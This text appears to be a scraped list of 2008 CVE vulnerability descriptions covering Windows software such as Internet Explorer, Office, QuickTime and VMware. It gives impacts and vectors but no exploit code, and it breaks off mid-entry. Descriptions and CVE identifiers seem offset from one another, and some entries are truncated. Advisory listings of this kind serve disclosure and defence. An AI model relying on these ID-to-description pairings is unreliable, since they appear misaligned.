QuickTime before 7.5.5 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image, which triggers heap corruption. [CVE-2008-3539] Unspecified vulnerability in HP OpenView Select Identity (HPSI) Connectors on Windows, as used in HPSI Active Directory Connector 2.30 and earlier, HPSI SunOne Connector 1.14 and earlier, HPSI eDirectory Connector 1.12 and earlier, HPSI eTrust Connector 1.02 and earlier, HPSI OID Connector 1.02 and earlier, HPSI IBM Tivoli Dir Connector 1.02 and earlier, HPSI TOPSecret Connector 2.22.001 and earlier, HPSI RACF Connector 1.12.001 and earlier, HPSI ACF2 Connector 1.02 and earlier, HPSI OpenLDAP Connector 1.02 and earlier, and HPSI BiDir DirX Connector 1.00.003 and earlier, allows local users to obtain sensitive information via unknown vectors. [CVE-2008-3538] Unspecified vulnerability in HP Enterprise Discovery 2.0 through 2.52 on Windows allows remote authenticated users to execute arbitrary code via unknown vectors. NOTE: the initial description of this CVE was inadvertently associated with libxml2, but it should be for HP Enterprise Discovery. [CVE-2008-3493] vncviewer.exe in RealVNC Windows Client 4.1.2.0 allows remote VNC servers to cause a denial of service (application crash) via a crafted frame buffer update packet. [CVE-2008-3477] Microsoft Excel 2000 SP3, 2002 SP3, and 2003 SP2 and SP3 does not properly validate data in the VBA Performance Cache when processing an Office document with an embedded object, which allows remote attackers to execute arbitrary code via an Excel file containing a crafted value, leading to heap-based buffer overflows, integer overflows, array index errors, and memory corruption, aka "Calendar Object Validation Vulnerability." [CVE-2008-3476] Microsoft Internet Explorer 5.01 SP4 and 6 does not properly handle errors associated with access to uninitialized memory, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "HTML Objects Memory Corruption Vulnerability." [CVE-2008-3475] Microsoft Internet Explorer 6 does not properly handle errors related to using the componentFromPoint method on xml objects that have been (1) incorrectly initialized or (2) deleted, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2008-3474] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy and obtain sensitive information via a crafted HTML document, aka "Cross-Domain Information Disclosure Vulnerability." [CVE-2008-3473] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "Event Handling Cross-Domain Vulnerability." [CVE-2008-3472] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "HTML Element Cross-Domain Vulnerability." [CVE-2008-3471] Stack-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3466] Microsoft Host Integration Server (HIS) 2000, 2004, and 2006 does not limit RPC access to administrative functions, which allows remote attackers to bypass authentication and execute arbitrary programs via a crafted SNA RPC message using opcode 1 or 6 to call the CreateProcess function, aka "HIS Command Execution Vulnerability." [CVE-2008-3460] WPGIMP32.FLT in Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3459] Unspecified vulnerability in OpenVPN 2.1-beta14 through 2.1-rc8, when running on non-Windows systems, allows remote servers to execute arbitrary commands via crafted (1) lladdr and (2) iproute configuration directives, probably related to shell metacharacters. [CVE-2008-3365] Directory traversal vulnerability in index.php in Pixelpost 1.7.1 on Windows, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language_full parameter. [CVE-2008-3363] Directory traversal vulnerability in user_portal.php in the Dokeos E-Learning System 1.8.5 on Windows allows remote attackers to include and execute arbitrary local files via a ..\ (dot dot backslash) in the include parameter. [CVE-2008-3173] Microsoft Internet Explorer allows web sites to set cookies for domains that have a public suffix with more than one dot character, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session, aka "Cross-Site Cooking." NOTE: this issue may exist because of an insufficient fix for CVE-2004-0866. [CVE-2008-3158] Unspecified vulnerability in NWFS.SYS in Novell Client for Windows 4.91 SP4 has unknown impact and attack vectors, possibly related to IOCTL requests that overwrite arbitrary memory. [CVE-2008-3079] Unspecified vulnerability in Opera before 9.51 on Windows allows attackers to execute arbitrary code via unknown vectors. [CVE-2008-3021] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3020] Microsoft Office 2000 SP3 and XP SP3 [CVE-2008-3019] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3018] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3015] Integer overflow in gdiplus.dll in GDI+ in Microsoft Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a BMP image file with a malformed BitMapInfoHeader that triggers a buffer overflow, aka "GDI+ BMP Integer Overflow Vulnerability." [CVE-2008-3007] Argument injection vulnerability in a URI handler in Microsoft Office XP SP3, 2003 SP2 and SP3, 2007 Office System Gold and SP1, and Office OneNote 2007 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted onenote:// URL, aka "Uniform Resource Locator Validation Error Vulnerability." [CVE-2008-3006] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3005] Array index vulnerability in Microsoft Office Excel 2000 SP3 and 2002 SP3, and Office 2004 and 2008 for Mac allows remote attackers to execute arbitrary code via an Excel file with a crafted array index for a FORMAT record, aka the "Excel Index Array Vulnerability." [CVE-2008-3004] Microsoft Office Excel 2000 SP3, 2002 SP3, and 2003 SP2 and SP3 [CVE-2008-3003] Microsoft Office Excel 2007 Gold and SP1 does not properly delete the PWD (password) string from connections.xml when a .xlsx file is configured not to save the remote data session password, which allows local users to obtain sensitive information and obtain access to a remote data source, aka the "Excel Credential Caching Vulnerability." [CVE-2008-2959] Buffer overflow in a certain ActiveX control (vb6skit.dll) in Microsoft Visual Basic Enterprise Edition 6.0 SP6 might allow remote attackers to execute arbitrary code via a long lpstrLinkPath argument to the fCreateShellLink function. [CVE-2008-2949] Cross-domain vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to change the location property of a frame via the String data type, and use a frame from a different domain to observe domain-independent events, as demonstrated by observing onkeydown events with caballero-listener. NOTE: according to Microsoft, this is a duplicate of CVE-2008-2947, possibly a different attack vector. [CVE-2008-2948] Cross-domain vulnerability in Microsoft Internet Explorer 7 and 8 allows remote attackers to change the location property of a frame via the Object data type, and use a frame from a different domain to observe domain-independent events, as demonstrated by observing onkeydown events with caballero-listener. NOTE: according to Microsoft, this is a duplicate of CVE-2008-2947, possibly a different attack vector. [CVE-2008-2947] Cross-domain vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, and 7 allows remote attackers to access restricted information from other domains via JavaScript that uses the Object data type for the value of a (1) location or (2) location.href property, related to incorrect determination of the origin of web script, aka "Window Location Property Cross-Domain Vulnerability." NOTE: according to Microsoft, CVE-2008-2948 and CVE-2008-2949 are duplicates of this issue, probably different attack vectors. [CVE-2008-2908] Multiple stack-based buffer overflows in a certain ActiveX control in ienipp.ocx in Novell iPrint Client for Windows before 4.36 allow remote attackers to execute arbitrary code via a long value of the (1) operation, (2) printer-url, or (3) target-frame parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-2894] Directory traversal vulnerability in the FTP client in NCH Software Classic FTP 1.02 for Windows allows remote FTP servers to create or overwrite arbitrary files via a .. (dot dot) in a response to a LIST command, a related issue to CVE-2002-1345. [CVE-2008-2841] Argument injection vulnerability in XChat 2.8.7b and earlier on Windows, when Internet Explorer is used, allows remote attackers to execute arbitrary commands via the --command parameter in an ircs:// URI. [CVE-2008-2821] Directory traversal vulnerability in the FTP client in Glub Tech Secure FTP before 2.5.16 on Windows allows remote FTP servers to create or overwrite arbitrary files via a ..\ (dot dot backslash) in a response to a LIST command, a related issue to CVE-2002-1345. [CVE-2008-2810] Mozilla Firefox before 2.0.0.15 and SeaMonkey before 1.1.10 do not properly identify the context of Windows shortcut files, which allows user-assisted remote attackers to bypass the Same Origin Policy via a crafted web site for which the user has previously saved a shortcut. [CVE-2008-2752] Microsoft Word 2000 9.0.2812 and 2003 11.8106.8172 does not properly handle unordered lists, which allows user-assisted remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .doc file. NOTE: some of these details are obtained from third party information. [CVE-2008-2747] No-IP Dynamic Update Client (DUC) 2.2.1 on Windows uses weak permissions for the HKLM\SOFTWARE\Vitalwerks\DUC registry key, which allows local users to obtain obfuscated passwords and other sensitive information by reading the (1) TrayPassword, (2) Username, (3) Password, and (4) Hosts registry values. [CVE-2008-2703] Multiple stack-based buffer overflows in Novell GroupWise Messenger (GWIM) Client before 2.0.3 HP1 for Windows allow remote attackers to execute arbitrary code via "spoofed server responses" that contain a long string after the NM_A_SZ_TRANSACTION_ID field name. [CVE-2008-2463] The Microsoft Office Snapshot Viewer ActiveX control in snapview.ocx 10.0.5529.0, as distributed in the standalone Snapshot Viewer and Microsoft Office Access 2000 through 2003, allows remote attackers to download arbitrary files to a client machine via a crafted HTML document or e-mail message, probably involving use of the SnapshotPath and CompressedPath properties and the PrintSnapshot method. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2008-2430] Integer overflow in the Open function in modules/demux/wav.c in VLC Media Player 0.8.6h on Windows allows remote attackers to execute arbitrary code via a large fmt chunk in a WAV file. [CVE-2008-2427] Stack-based buffer overflow in NConvert 4.92, GFL SDK 2.82, and XnView 1.93.6 on Windows and 1.70 on Linux and FreeBSD allows user-assisted remote attackers to execute arbitrary code via a crafted format keyword in a Sun TAAC file. [CVE-2008-2400] Unspecified vulnerability in stunnel before 4.23, when running as a service on Windows, allows local users to gain privileges via unknown attack vectors. [CVE-2008-2326] mDNSResponder in the Bonjour Namespace Provider in Apple Bonjour for Windows before 1.0.5 allows attackers to cause a denial of service (NULL pointer dereference and application crash) by resolving a crafted .local domain name that contains a long label. [CVE-2008-2325] QuickLook in Apple Mac OS X 10.4.11 and 10.5.4 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted Microsoft Office file, related to insufficient "bounds checking." [CVE-2008-2307] Unspecified vulnerability in WebKit in Apple Safari before 3.1.2, as distributed in Mac OS X before 10.5.4, and standalone for Windows and Mac OS X 10.4, allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via vectors involving JavaScript arrays that trigger memory corruption. [CVE-2008-2306] Apple Safari before 3.1.2 on Windows does not properly interpret the URLACTION_SHELL_EXECUTE_HIGHRISK Internet Explorer zone setting, which allows remote attackers to bypass intended access restrictions, and force a client system to download and execute arbitrary files. [CVE-2008-2259] Microsoft Internet Explorer 6 and 7 does not perform proper "argument validation" during print preview, which allows remote attackers to execute arbitrary code via unknown vectors, aka "HTML Component Handling Vulnerability." [CVE-2008-2258] Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory in certain conditions, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via vectors related to a document object "appended in a specific order" with "particular functions ... performed on" document objects, aka "HTML Objects Memory Corruption Vulnerability" or "Table Layout Memory Corruption Vulnerability," a different vulnerability than CVE-2008-2257. [CVE-2008-2257] Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory in certain conditions, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via vectors related to a document object "appended in a specific order," aka "HTML Objects Memory Corruption Vulnerability" or "XHTML Rendering Memory Corruption Vulnerability," a different vulnerability than CVE-2008-2258. [CVE-2008-2256] Microsoft Internet Explorer 5.01, 6, and 7 does not properly handle objects that have been incorrectly initialized or deleted, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2008-2255] Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, a different vulnerability than CVE-2008-2254, aka "HTML Object Memory Corruption Vulnerability." [CVE-2008-2254] Microsoft Internet Explorer 6 and 7 accesses uninitialized memory, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, aka "HTML Object Memory Corruption Vulnerability." [CVE-2008-2244] Microsoft Office Word 2002 SP3 allows remote attackers to execute arbitrary code via a .doc file that contains malformed data, as exploited in the wild in July 2008, and as demonstrated by attachement.doc. [CVE-2008-2163] Cross-site scripting (XSS) vulnerability in IBM Lotus Quickr 8.1 before Hotfix 5 for Windows and AIX, and before Hotfix 3 for i5/OS, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to "WYSIWYG editors." [CVE-2008-2161] Buffer overflow in TFTP Server SP 1.4 and 1.5 on Windows, and possibly other versions, allows remote attackers to execute arbitrary code via a long TFTP error packet. NOTE: some of these details are obtained from third party information. [CVE-2008-2159] Microsoft Internet Explorer 7 can save encrypted pages in the cache even when the DisableCachingOfSSLPages registry setting is enabled, which might allow local users to obtain sensitive information. [CVE-2008-2158] Multiple stack-based buffer overflows in the Command Line Interface process in the Server Agent in EMC AlphaStor 3.1 SP1 for Windows allow remote attackers to execute arbitrary code via crafted TCP packets to port 41025. [CVE-2008-2157] robotd in the Library Manager in EMC AlphaStor 3.1 SP1 for Windows allows remote attackers to execute arbitrary commands via an unspecified string field in a packet to TCP port 3500. [CVE-2008-2143] Unspecified versions of Microsoft Outlook Web Access (OWA) use the Cache-Control: no-cache HTTP directive instead of no-store, which might cause web browsers that follow RFC-2616 to cache sensitive information. [CVE-2008-2099] Unspecified vulnerability in VMCI in VMware Workstation 6 before 6.0.4 build 93057, VMware Player 2 before 2.0.4 build 93057, and VMware ACE 2 before 2.0.2 build 93057 on Windows allows guest OS users to execute arbitrary code on the host OS via unspecified vectors. [CVE-2008-2010] Unspecified vulnerability in Apple QuickTime Player on Windows XP SP2 and Vista SP1 allows remote attackers to execute arbitrary code via a crafted QuickTime media file. NOTE: as of 20080429, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-1998] The NNSTAT (aka SYSPROC.NNSTAT) procedure in IBM DB2 8 before FP16, 9.1 before FP4a, and 9.5 before FP1 on Windows allows remote authenticated users to overwrite arbitrary files via the log file parameter. [CVE-2008-1932] Integer overflow in Realtek HD Audio Codec Drivers RTKVHDA.sys and RTKVHDA64.sys before 6.0.1.5605 on Windows Vista allows local users to execute arbitrary code via a crafted IOCTL request. [CVE-2008-1931] Realtek HD Audio Codec Drivers RTKVHDA.sys and RTKVHDA64.sys before 6.0.1.5605 on Windows Vista allow local users to create, write, and read registry keys via a crafted IOCTL request. [CVE-2008-1898] A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call. [CVE-2008-1709] Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long malformed Project line beginning with a 'Project("{}") =' sequence, probably a different vector than CVE-2008-0250. [CVE-2008-1667] The Probe Builder Service (aka PBOVISServer.exe) in European Performance Systems (EPS) Probe Builder 2.2 before A.02.20.901, as used in HP OpenView Internet Services (OVIS) on Windows, allows remote attackers to kill arbitrary processes via a process ID number in an unspecified opcode. [CVE-2008-1663] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) 2.1.10 and 2.1.11 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1625] aavmker4.sys in avast! Home and Professional 4.7 for Windows does not properly validate input to IOCTL 0xb2d60030, which allows local users to gain privileges via certain IOCTL requests. [CVE-2008-1611] Stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a denial of service or execute arbitrary code via a long filename in a read or write request. [CVE-2008-1581] Heap-based buffer overflow in Apple QuickTime before 7.5 on Windows allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted packed scanlines in PixData structures in a PICT image. [CVE-2008-1547] Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. [CVE-2008-1545] The setRequestHeader method of the XMLHttpRequest object in Microsoft Internet Explorer 7 does not restrict the dangerous Transfer-Encoding HTTP request header, which allows remote attackers to conduct HTTP request splitting and HTTP request smuggling attacks via a POST containing a "Transfer-Encoding: chunked" header and a request body with an incorrect chunk size. [CVE-2008-1544] The setRequestHeader method of the XMLHttpRequest object in Microsoft Internet Explorer 5.01, 6, and 7 does not block dangerous HTTP request headers when certain 8-bit character sequences are appended to a header name, which allows remote attackers to (1) conduct HTTP request splitting and HTTP request smuggling attacks via an incorrect Content-Length header, (2) access arbitrary virtual hosts via a modified Host header, (3) bypass referrer restrictions via an incorrect Referer header, and (4) bypass the same-origin policy and obtain sensitive information via a crafted request header. [CVE-2008-1455] A "memory calculation error" in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, 2003 SP2, and 2007 through SP1 [CVE-2008-1442] Heap-based buffer overflow in the substringData method in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code, related to an unspecified manipulation of a DOM object before a call to this method, aka the "HTML Objects Memory Corruption Vulnerability." [CVE-2008-1438] Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (disk space exhaustion) via a file with "crafted data structures" that trigger the creation of large temporary files, a different vulnerability than CVE-2008-1437. [CVE-2008-1437] Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (engine hang and restart) via a crafted file, a different vulnerability than CVE-2008-1438. [CVE-2008-1434] Use-after-free vulnerability in Microsoft Word in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 Office System SP1 and earlier allows remote attackers to execute arbitrary code via an HTML document with a large number of Cascading Style Sheets (CSS) selectors, related to a "memory handling error" that triggers memory corruption. [CVE-2008-1402] MG-SOFT Net Inspector 6.5.0.828 and earlier for Windows allows remote attackers to cause a (1) denial of service (exception and crash) via a UDP packet to the SNMP Trap Service (MgWTrap3.exe) or (2) denial of service (device freeze or memory consumption) via a malformed request to the Net Inspector Server (niengine). [CVE-2008-1401] Format string vulnerability in the Net Inspector HTTP server (mghttpd) in MG-SOFT Net Inspector 6.5.0.828 and earlier for Windows allows remote attackers to execute arbitrary code via format string specifiers in the URI, which is recorded in a log file. [CVE-2008-1400] Directory traversal vulnerability in the Net Inspector HTTP Server (mghttpd) in MG-SOFT Net Inspector 6.5.0.828 and earlier for Windows allows remote attackers to read arbitrary files via a "..\" (dot dot backslash) or "../" (dot dot slash) in the URI. [CVE-2008-1368] CRLF injection vulnerability in Microsoft Internet Explorer 5 and 6 allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded CRLF (%0D%0A) before the FTP command, which causes the commands to be inserted into an authenticated FTP connection established earlier in the same browser session, as demonstrated using a DELE command, a variant or possibly a regression of CVE-2004-1166. NOTE: a trailing "//" can force Internet Explorer to try to reuse an existing authenticated connection. [CVE-2008-1363] VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges via an unspecified manipulation of a config.ini file located in an Application Data folder, which can be used for "hijacking the VMX process." [CVE-2008-1362] VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges or cause a denial of service by impersonating the authd process through an unspecified use of an "insecurely created named pipe," a different vulnerability than CVE-2008-1361. [CVE-2008-1361] VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges via an unspecified manipulation that causes the authd process to connect to an arbitrary named pipe, a different vulnerability than CVE-2008-1362. [CVE-2008-1337] The instant message service in Timbuktu Pro 8.6.5 RC 229 and earlier for Windows allows remote attackers to cause (1) a denial of service (daemon crash) via an invalid Version field or (2) a denial of service (CPU consumption and daemon termination) via an invalid or partial message. [CVE-2008-1330] Unspecified vulnerability in the Windows client API in Novell GroupWise 7 before SP3 and 6.5 before SP6 Update 3 allows remote authenticated users to access the non-shared stored e-mail messages of another user who has shared at least one folder with the attacker. [CVE-2008-1299] Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine ServiceDesk Plus 7.0.0 Build 7011 for Windows allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. NOTE: the provenance of this information is unknown [CVE-2008-1280] Acronis True Image Windows Agent 1.0.0.54 and earlier, included in Acronis True Image Enterprise Server 9.5.0.8072 and the other True Image packages, allows remote attackers to cause a denial of service (crash) via a malformed packet to port 9876, which triggers a NULL pointer dereference. [CVE-2008-1204] Multiple cross-site scripting (XSS) vulnerabilities in the Administration Console in Sun Java System Access Manager 7.1 and 7 2005Q4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the (1) Help and (2) Version windows. [CVE-2008-1201] Multiple unspecified vulnerabilities in FLA file parsing in Adobe Flash CS3 Professional, Flash Professional 8, and Flash Basic 8 on Windows allow user-assisted remote attackers to execute arbitrary code via a crafted .FLA file. [CVE-2008-1200] Unspecified vulnerability in Microsoft Access allows remote user-assisted attackers to execute arbitrary code via a crafted .MDB file, possibly related to Jet Engine (msjet40.dll). NOTE: this is probably a different issue than CVE-2007-6026. [CVE-2008-1118] Timbuktu Pro 8.6.5 for Windows, and possibly 8.7 for Mac OS X, does not perform input validation before logging information fields taken from packets from a remote peer, which allows remote attackers to generate crafted log entries, and possibly avoid detection of attacks, via modified (1) computer name, (2) user name, and (3) IP address fields. [CVE-2008-1117] Directory traversal vulnerability in the Notes (aka Flash Notes or instant messages) feature in tb2ftp.dll in Timbuktu Pro 8.6.5 for Windows, and possibly 8.7 for Mac OS X, allows remote attackers to upload files to arbitrary locations via a destination filename with a \ (backslash) character followed by ../ (dot dot slash) sequences. NOTE: this can be leveraged for code execution by writing to a Startup folder. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2007-4220. [CVE-2008-1092] Buffer overflow in msjet40.dll before 4.0.9505.0 in Microsoft Jet Database Engine allows remote attackers to execute arbitrary code via a crafted Word file, as exploited in the wild in March 2008. NOTE: as of 20080513, Microsoft has stated that this is the same issue as CVE-2007-6026. [CVE-2008-1091] Unspecified vulnerability in Microsoft Word in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 Office System SP1 and earlier allows remote attackers to execute arbitrary code via a Rich Text Format (.rtf) file with a malformed string that triggers a "memory calculation error" and a heap-based buffer overflow, aka "Object Parsing Vulnerability." [CVE-2008-1090] Unspecified vulnerability in Microsoft Visio 2002 SP2, 2003 SP2 and SP3, and 2007 up to SP1 allows user-assisted remote attackers to execute arbitrary code via a crafted .DXF file, aka "Visio Memory Validation Vulnerability." [CVE-2008-1089] Unspecified vulnerability in Microsoft Visio 2002 SP2, 2003 SP2 and SP3, and 2007 up to SP1 allows user-assisted remote attackers to execute arbitrary code via a Visio file containing crafted object header data, aka "Visio Object Header Vulnerability." [CVE-2008-1088] Microsoft Project 2000 Service Release 1, 2002 SP1, and 2003 SP2 allows user-assisted remote attackers to execute arbitrary code via a crafted Project file, related to improper validation of "memory resource allocations." [CVE-2008-1085] Use-after-free vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 through SP1, and 7 allows remote attackers to execute arbitrary code via a crafted data stream that triggers memory corruption, as demonstrated using an invalid MIME-type that does not have a registered handler. [CVE-2008-1024] Apple Safari before 3.1.1, when running on Windows XP or Vista, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a file download with a crafted file name, which triggers memory corruption. [CVE-2008-1023] Heap-based buffer overflow in Clip opcode parsing in Apple QuickTime before 7.4.5 on Windows allows remote attackers to execute arbitrary code via a crafted PICT image file. [CVE-2008-1021] Heap-based buffer overflow in Animation codec content handling in Apple QuickTime before 7.4.5 on Windows allows remote attackers to execute arbitrary code via a crafted movie with run length encoding. [CVE-2008-1020] Heap-based buffer overflow in quickTime.qts in Apple QuickTime before 7.4.5 on Windows allows remote attackers to execute arbitrary code via a crafted PICT image file with Kodak encoding, related to error checking and error messages. [CVE-2008-1001] Cross-site scripting (XSS) vulnerability in Apple Safari before 3.1, when running on Windows XP or Vista, allows remote attackers to inject arbitrary web script or HTML via a crafted URL that is not properly handled in the error page. [CVE-2008-0768] Multiple stack-based and heap-based buffer overflows in the Windows RPC components for IBM Informix Storage Manager (ISM), as used in Informix Dynamic Server (IDS) 10.00.xC8 and earlier and 11.10.xC2 and earlier, allow attackers to execute arbitrary code via crafted XDR requests. [CVE-2008-0766] Stack-based buffer overflow in RpmSrvc.exe in Brooks Remote Print Manager (RPM) 4.5.1.11 and earlier (Elite and Select) for Windows allows remote attackers to execute arbitrary code via a long filename in a "Receive data file" LPD command. NOTE: some of these details are obtained from third party information. [CVE-2008-0764] Format string vulnerability in the logging function in Larson Network Print Server (LstNPS) 9.4.2 build 105 and earlier for Windows might allow remote attackers to execute arbitrary code via format string specifiers in a USEP command on TCP port 3114. [CVE-2008-0663] Novell Challenge Response Client (LCM) 2.7.5 and earlier, as used with Novell Client for Windows 4.91 SP4, allows users with physical access to a locked system to obtain contents of the clipboard by pasting the contents into the Challenge Question field. [CVE-2008-0662] The Auto Local Logon feature in Check Point VPN-1 SecuRemote/SecureClient NGX R60 and R56 for Windows caches credentials under the Checkpoint\SecuRemote registry key, which has Everyone/Full Control permissions, which allows local users to gain privileges by reading and reusing the credentials. [CVE-2008-0639] Stack-based buffer overflow in the EnumPrinters function in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2, SP3, and SP4 for Windows allows remote attackers to execute arbitrary code via a crafted RPC request, aka Novell bug 353138, a different vulnerability than CVE-2006-5854. NOTE: this issue exists because of an incomplete fix for CVE-2007-6701. [CVE-2008-0583] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Description and unspecified other metadata fields of a Metacafe movie submitted by Metacafe Pro to the Skype video gallery, accessible through a search within the (1) "Add video to chat" or (2) "Add video to mood" dialog, a different vector than CVE-2008-0454. [CVE-2008-0582] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.1 through 3.6.0.244 on Windows allows remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Full Name field of a reviewer of a business item entry, accessible through (1) the SkypeFind dialog and (2) a skype:?skypefind URI for the skype: URI handler. [CVE-2008-0533] Multiple cross-site scripting (XSS) vulnerabilities in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to inject arbitrary web script or HTML via an argument located immediately after the Help argument, and possibly unspecified other vectors. [CVE-2008-0532] Multiple buffer overflows in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to execute arbitrary code via a long argument located immediately after the Logout argument, and possibly unspecified other vectors. [CVE-2008-0454] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Title field of a (1) Dailymotion and possibly (2) Metacafe movie in the Skype video gallery, accessible through a search within the "Add video to chat" dialog, aka "videomood XSS." [CVE-2008-0392] Multiple buffer overflows in Microsoft Visual Basic Enterprise Edition 6.0 SP6 allow user-assisted remote attackers to execute arbitrary code via a .dsr file with a long (1) ConnectionName or (2) CommandName line. [CVE-2008-0296] Heap-based buffer overflow in the libaccess_realrtsp plugin in VideoLAN VLC Media Player 0.8.6d and earlier on Windows might allow remote RTSP servers to cause a denial of service (application crash) or execute arbitrary code via a long string. [CVE-2008-0250] Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long Project line. [CVE-2008-0237] The Microsoft Rich Textbox ActiveX Control (RICHTX32.OCX) 6.1.97.82 allows remote attackers to execute arbitrary commands by invoking the insecure SaveFile method. [CVE-2008-0236] An ActiveX control for Microsoft Visual FoxPro (vfp6r.dll 6.0.8862.0) allows remote attackers to execute arbitrary commands by invoking the DoCmd method. [CVE-2008-0235] The Microsoft VFP_OLE_Server ActiveX control allows remote attackers to execute arbitrary code by invoking the foxcommand method. [CVE-2008-0121] A "memory calculation error" in Microsoft PowerPoint Viewer 2003 allows remote attackers to execute arbitrary code via a PowerPoint file with an invalid picture index that triggers memory corruption, aka "Memory Calculation Vulnerability." [CVE-2008-0120] Integer overflow in Microsoft PowerPoint Viewer 2003 allows remote attackers to execute 